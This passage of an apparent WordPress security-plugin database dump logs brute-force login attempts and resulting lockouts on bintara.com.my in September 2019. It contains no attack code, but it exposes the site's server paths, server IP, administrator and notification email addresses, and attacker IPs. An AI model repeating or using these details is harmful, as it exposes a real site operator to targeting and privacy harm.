_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsSHkXpgmG5P@iB8k4UQAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074248.4966\";s:12:\"REQUEST_TIME\";s:10:\"1569074248\";}}','notice','2019-09-21 13:57:29','2019-09-21 13:57:28',17846672,19336656,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.29.98'),(26075,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:57:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:57:28\";s:14:\"lockout_expire\";s:19:\"2019-09-26 01:57:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 17:57:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:57:29','2019-09-21 13:57:28',17931552,19336656,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.29.98'),(26076,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:57:29','2019-09-21 13:57:28',18138192,19336656,'https://bintara.com.my/blog/wp-login.php',1,0,'68.183.29.98'),(26077,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsSnkXpgmG5P@iB8k4UwAAAJg\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"68.183.29.98\";s:11:\"REMOTE_PORT\";s:5:\"58904\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsSnkXpgmG5P@iB8k4UwAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074251.0886\";s:12:\"REQUEST_TIME\";s:10:\"1569074251\";}}','notice','2019-09-21 13:57:32','2019-09-21 13:57:31',18364352,19661200,'https://bintara.com.my/blog/xmlrpc.php',1,0,'68.183.29.98'),(26078,0,'lockout','username-lockout::admin','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:5:\"admin\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:57:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:57:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 01:57:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 17:57:31\";s:16:\"lockout_username\";s:5:\"admin\";}','action','2019-09-21 13:57:32','2019-09-21 13:57:31',18444560,19661200,'https://bintara.com.my/blog/xmlrpc.php',1,0,'68.183.29.98'),(26079,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:57:32','2019-09-21 13:57:31',18653248,19661200,'https://bintara.com.my/blog/xmlrpc.php',1,0,'68.183.29.98'),(26080,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsinkXpgmG5P@iB8k4fAAAAIg\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"43291\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsinkXpgmG5P@iB8k4fAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074314.2602\";s:12:\"REQUEST_TIME\";s:10:\"1569074314\";}}','notice','2019-09-21 13:58:35','2019-09-21 13:58:34',17846488,19337160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'188.165.250.134'),(26081,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYsjViJ7D9Gn7wDPh8kQgAAAMc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"37.187.132.107\";s:11:\"REMOTE_PORT\";s:5:\"32602\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYsjViJ7D9Gn7wDPh8kQgAAAMc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074317.9291\";s:12:\"REQUEST_TIME\";s:10:\"1569074317\";}}','notice','2019-09-21 13:58:39','2019-09-21 13:58:38',17848784,19338384,'https://bintara.com.my/test/wp-login.php',1,0,'37.187.132.107'),(26082,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 21:58:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 13:58:38\";s:14:\"lockout_expire\";s:19:\"2019-09-26 01:58:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 17:58:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 13:58:39','2019-09-21 13:58:38',17933592,19338384,'https://bintara.com.my/test/wp-login.php',1,0,'37.187.132.107'),(26083,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 13:58:39','2019-09-21 13:58:38',18140048,19338384,'https://bintara.com.my/test/wp-login.php',1,0,'37.187.132.107'),(26084,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYs9XkXpgmG5P@iB8k43AAAAIY\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.65.85.105\";s:11:\"REMOTE_PORT\";s:5:\"20501\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYs9XkXpgmG5P@iB8k43AAAAIY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074421.6126\";s:12:\"REQUEST_TIME\";s:10:\"1569074421\";}}','notice','2019-09-21 14:00:22','2019-09-21 14:00:21',17849256,19337848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'159.65.85.105'),(26085,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYs93kXpgmG5P@iB8k43gAAAJA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.72.117\";s:11:\"REMOTE_PORT\";s:5:\"53876\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYs93kXpgmG5P@iB8k43gAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1569074423.99\";s:12:\"REQUEST_TIME\";s:10:\"1569074423\";}}','notice','2019-09-21 14:00:25','2019-09-21 14:00:24',17847704,19338032,'https://bintara.com.my/test/wp-login.php',1,0,'178.128.72.117'),(26086,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYtInkXpgmG5P@iB8k4-wAAAIA\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"138.68.245.137\";s:11:\"REMOTE_PORT\";s:5:\"56694\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYtInkXpgmG5P@iB8k4-wAAAIA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074466.7567\";s:12:\"REQUEST_TIME\";s:10:\"1569074466\";}}','notice','2019-09-21 14:01:08','2019-09-21 14:01:07',17848640,19338416,'https://bintara.com.my/2019/wp-login.php',1,0,'138.68.245.137'),(26087,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 